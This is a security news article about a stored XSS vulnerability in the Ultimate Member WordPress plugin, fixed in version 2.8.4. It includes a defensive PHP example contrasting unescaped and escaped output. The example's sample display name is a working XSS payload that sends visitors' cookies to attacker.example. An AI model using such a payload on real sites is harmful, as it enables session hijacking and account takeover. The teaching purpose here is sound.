200,000+ Websites are at Risk of XSS Attacks Due to a WordPress Plugin Flaw

A vulnerability in the Ultimate Member WordPress plugin has exposed more than 200,000 websites to Cross-Site Scripting (XSS) attacks. The flaw was reported by a researcher using the handle Stealthcooper, and it underlines both the persistent threat to the WordPress plugin ecosystem and the role security vendors play in keeping sites safe.

Disclosure and Discovery

Stealthcooper filed a report describing an unauthenticated stored XSS vulnerability in the Ultimate Member plugin during the Wordfence Bug Bounty Extravaganza. With more than 200,000 active installations, this plugin, which handles user profiles, registration, and membership management, gives the flaw a significant potential impact.

Wordfence, a leading security provider for WordPress sites, awarded Stealthcooper a $563 bounty for the discovery. The company validated the report and notified the Ultimate Member team promptly, and a patched release (version 2.8.4) was available by 6 March 2024, reducing the exposure of the affected sites and their visitors.

Technical Breakdown

The vulnerability, tracked as CVE-2024-2123, lets attackers inject malicious scripts into websites running Ultimate Member in all versions up to and including 2.8.3. It stems from insufficient input sanitization and output escaping, specifically in the plugin's member directory list functionality.

Analysis of the plugin code showed that user display names were not escaped when rendered in the template files. An unauthenticated attacker could therefore register an account with a display name containing a script, which would be stored and then executed in the browser of anyone who viewed the member directory. If an administrator loads that page, the injected script runs with the administrator's session and can create new admin users, redirect visitors to malicious sites, or inject backdoors into theme and plugin files.
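The bug class above, shown side by side with its fix, as an added illustration that is not Ultimate Member's code or Wordfence's analysis: a member-directory card template that echoes a stored display name raw, next to one that escapes it for each HTML context it lands in. The markup, CSS class names, and the attacker-controlled display name are all constructed for this example; outside WordPress, `esc_html()` and `esc_attr()` do not exist, so equivalents built on `htmlspecialchars()` are defined here to keep the script runnable stand-alone.

```php
<?php
// Added example (not the plugin's own code). Demonstrates stored XSS via an
// unescaped display name in a member-directory template, and the hardened form.

// Stand-ins for WordPress's esc_html()/esc_attr() so this runs outside WordPress.
// Inside WordPress the real functions are already defined and these are skipped.
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}

// Constructed sample: a display name an unauthenticated registrant could submit.
// It needs no <script> tag; an event handler on a broken image is enough.
$displayName = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable rendering: the stored name is interpolated into HTML untouched,
// so the browser parses the <img> tag and fires onerror for every viewer,
// including an administrator browsing the directory.
function render_member_card_vulnerable(string $displayName): string
{
    return '<div class="um-member-card" data-name="' . $displayName . '">'
         . '<span class="um-member-name">' . $displayName . '</span></div>';
}

// Hardened rendering: escape on output, choosing the escaper for the context
// (attribute value vs. text node). The name is still displayed, but as text.
function render_member_card_safe(string $displayName): string
{
    return '<div class="um-member-card" data-name="' . esc_attr($displayName) . '">'
         . '<span class="um-member-name">' . esc_html($displayName) . '</span></div>';
}

// Defence in depth at registration time (WordPress would use sanitize_text_field()
// or wp_strip_all_tags(); strip_tags() stands in here). This is a second layer,
// not a replacement for output escaping: a name like  " onmouseover="...
// contains no tag at all, survives strip_tags(), and still breaks out of an
// attribute if the template does not escape.
function sanitize_display_name(string $raw): string
{
    $clean = strip_tags($raw);
    return trim(mb_substr($clean, 0, 64));
}

echo "Vulnerable output:\n" . render_member_card_vulnerable($displayName) . "\n\n";
echo "Hardened output:\n"   . render_member_card_safe($displayName) . "\n\n";
echo "Input-sanitized name: " . sanitize_display_name($displayName) . "\n";
```

Run it with `php example.php`. The vulnerable output contains the literal `<img ... onerror=...>` tag twice; the hardened output contains only `&lt;img ...&gt;` and `&quot;`-escaped quotes, so a browser renders the payload as visible text. The point a reviewer should take from this is that the fix lives at the output site, chosen per context; sanitizing the name on registration is worthwhile but, as the attribute-breakout comment shows, cannot be relied on alone.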

The discovery is a reminder that site owners need to apply updates promptly and maintain vigilant security practices. Sites still running vulnerable Ultimate Member versions (2.8.3 and earlier) can be exploited by unauthenticated attackers, which may lead to further compromise, including unauthorised administrator access.

Wordfence's firewall, with its built-in XSS protection, provided early protection against this issue for its users. This covers users of Wordfence's free edition as well as subscribers to Wordfence Premium, Wordfence Care, and Wordfence Response.